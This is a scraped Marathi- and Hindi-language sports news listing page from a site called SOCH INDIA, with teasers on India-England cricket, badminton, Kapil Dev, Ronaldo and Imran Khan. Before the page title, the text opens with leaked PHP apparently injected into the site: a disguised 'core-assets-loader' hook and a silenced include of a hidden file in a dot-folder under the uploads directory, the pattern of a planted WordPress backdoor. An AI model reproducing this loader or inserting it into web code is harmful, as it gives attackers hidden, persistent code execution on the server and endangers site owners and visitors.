add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); खेल – SOCH INDIA
Menu

एका दशकापूर्वी अशी स्थिती होती की सचिन तेंडुलकरला बाद करा आणि भारताला हरवा असं विरोधी संघ म्हणायचे. जोपर्यंत सचिन खेळपट्टीवर आहे तोपर्यंत विजयाची आशा प्रतिस्पर्ध्याला नसायची. आता सचिनची जागा विराटनं घेतल्याचं दिसून येत आहे. इंग्लंडविरुद्धच्या कसोटी सामन्यात विराटनं एकहाती खेळी करत भारताला पहिल्या डावामध्ये समाधानकारक लक्ष्यापर्यंत पोचवलं आणि लाज...

Read More

भारतीय ऑलिम्पिक संघटनेकडून बदनामी टाळण्यासाठीचा उपाय राष्ट्रकुल क्रीडा स्पर्धेच्या वेळी भारतीय खेळाडूंकडे इंजेक्शन्स सापडल्यामुळे झालेली बदनामी टाळण्यासाठी भारतीय ऑलिम्पिक संघटनेने (आयओए) खेळाडूंनी शक्यतो इंजेक्शन्स नेऊ नये, असे सर्व राष्ट्रीय क्रीडा संघटनांना कळवले आहे. खेळाडूंना जी काही औषधे न्यायची आहेत किंवा इंजेक्शन्स न्यायची असल्यास संबंधित खेळांच्या राष्ट्रीय संघटनेकडून पूर्वपरवानगी घेणे...

Read More

१ ऑगस्टपासून भारत आणि इंग्लंड यांच्यात ५ कसोटी सामन्यांच्या मालिकेला सुरुवात होणार आहे. बर्मिंगहॅमच्या मैदानावर पहिला कसोटी सामना खेळवला जाणार आहे, घरच्या मैदानावर कसोटी सामन्यांमध्ये सर्वोत्तम खेळ करणारा भारतीय संघ इंग्लंडमध्ये ढेपाळतो हा इतिहास आहे. मात्र यंदाचा दौरा हा भारतीय संघासाठी अनेक बाबींमध्ये वेगळा ठरणार आहे. सध्या जागतिक क्रमवारीत...

Read More

जागतिक बॅडमिंटन चॅम्पियनशीप स्पर्धेत पहिल्याच दिवशी भारतीय खेळाडूंनी चांगली सुरुवात केली आहे. एकेरी आणि दुहेरीच्या सामन्यांमध्ये भारतीय खेळाडूंनी आपले पहिल्या फेरीतले सामने जिंकले आहेत. पुरुषांमध्ये प्रणॉय पाठोपाठ समीर वर्मानेही आपल्या पहिल्या फेरीचा सामना जिंकला आहे. समीरने फ्रान्सच्या लुकास कोरवीवर सरळ दोन सेट्समध्ये मात केली. २१-१३, २१-१० अशा दोन सेट्समध्ये...

Read More

भारताला पहिला विश्वचषक मिळवून देणारे माजी कर्णधार कपिल देव पुन्हा एकदा मैदानावर पुनरागमन करण्यासाठी सज्ज झालेले आहेत. मात्र आता कपिल देव हे क्रिकेट नाही तर गोल्फच्या माध्यमातून पुन्हा एकदा मैदानावर उतरणार आहेत. जपानमध्ये १७ ते १९ ऑक्टोबर दरम्यान होणाऱ्या Asia Pacafic Senior 2018 स्पर्धेसाठी कपिल देव यांची भारतीय संघात...

Read More

शॉर्टर फॉर्मेट के बाद अब इंग्लैंड की टीम टेस्ट क्रिकेट में भारत पर शिकंजा कसने की तैयारी में है. जिसके लिए इंग्लैंड के इनफॉर्म बल्लेबाज़ जोस बटलर ने भी बयान दे दिया है. इंग्लैंड के स्टार जोस बटलर ने कहा है कि डेढ़ महीने लंबी इस सीरीज़ में आईपीएल...

Read More

दिग्गज फुटबालर क्रिस्टियानो रोनाल्डो ने स्पेन में टैक्स चोरी के मामले में 1.9 करोड़ यूरो (2.2 करोड़ डालर) का भुगतान कर मामले को सुलझा लिया है. रोनाल्डो के अभियोजक (प्रोसिक्यूटर) ने कहा कि रोनाल्डो के सलाहकारों और टैक्स अधिकारियों के बीच हुए इस करार के बाद वह दो साल...

Read More

दक्षिण आफ्रिकेचा माजी क्रिकेटपटू आणि वन-डे क्रिकेटमध्ये क्षेत्ररक्षणाची परिभाषा बदलणाऱ्या जॉन्टी ऱ्होड्सला आज वाढदिवस आहे. क्षेत्ररक्षणातला चित्ता अशी ओळख असलेल्या जॉन्टीने आज वयाच्या ४९ व्या वर्षात पदार्पण केलं आहे. जगभरातून आज जॉन्टीवर शुभेच्छांचा वर्षाव होत आहे. मात्र भारताचा माजी क्रिकेटपटू सचिन तेंडुलकरने जॉन्टीला दिलेल्या वाढदिवसाच्या शुभेच्छा सोशल मीडियावर चर्चेचा...

Read More

भारत विरुद्ध इंग्लंड यांच्यात सुरु होणाऱ्या कसोटी मालिकेआधी भारतीय संघाला धक्का बसला आहे. फिरकीपटू रविचंद्रन आश्विनच्या हाताला दुखापत झाल्यामुळे त्याने Essex विरुद्धच्या सराव सामन्यात सहभाग घेतला नाही. सरावादरम्यान नेट्समध्ये गोलंदाजी करत असताना आश्विनच्या उजव्या हातावर चेंडूचा जोरदार फटका बसला आहे. यानंतर खबरदारीचा उपाय म्हणून आश्विनने गोलंदाजी करणं टाळलं आहे....

Read More

पाकिस्तानमध्ये सत्ताबदलाचे वारे वहायला लागलेले आहेत, माजी क्रिकेटपटू आणि तेहरीक ए इन्साफ पक्षाचे प्रमुख इम्रान खान पाकचे नवीन पंतप्रधान होण्याच्या वाटेवर आहेत. मतमोजणीमध्ये इम्रान खान यांच्या पक्षाने १०० पेक्षा जास्त जागांवर विजय मिळवलेला आहे. मात्र पाकिस्तानात सत्ता स्थापन करण्यासाठी २७२ पैकी १३७ खासदारांची आवश्यकता असते. सध्याच्या घडीला काही पक्षांच्या...

Read More